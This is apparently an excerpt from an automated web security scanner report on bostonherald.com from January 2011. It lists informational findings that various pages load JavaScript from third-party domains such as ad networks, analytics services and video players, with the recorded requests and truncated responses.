Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.649. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.650. http://www.bostonherald.com/lottery/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /lottery/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lottery/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:11:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<link rel=STYLESHEET href="http://www.playlottery247.com/css/LS_A.css" type="text/css">
<script language="JAVASCRIPT" src="http://www.playlottery247.com/js/ldc_feed.js"></script>
<script Language="JAVASCRIPT" src="http://www.playlottery247.com/js/usmaps/uscanada_416x302.js"></script>
<script Language="JAVASCRIPT" src="http://www.playlottery247.com/feed/jp/topjp_fmt1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.651. http://www.bostonherald.com/mediacenter/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mediacenter/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>


                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=45" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</body>


       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

18.652. http://www.bostonherald.com/mediacenter/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mediacenter/index.php HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>


                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=973" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</body>


       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

18.653. http://www.bostonherald.com/mediacenter/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:57:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 339722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>


                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=283" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</body>


       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

18.654. http://www.bostonherald.com/mediacenter/video.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2489
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

18.655. http://www.bostonherald.com/mediacenter/video.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mediacenter/video.php HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:58:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2341
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">


        <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/_p.js"></script>
...[SNIP]...

18.656. http://www.bostonherald.com/mediacenter/video.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:58:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2589
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">


        <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js"></script>
...[SNIP]...

18.657. http://www.bostonherald.com/mobile/info.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mobile/info.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobile/info.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:15:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>BostonHerald.com Mobile
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Finance -->
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</script>
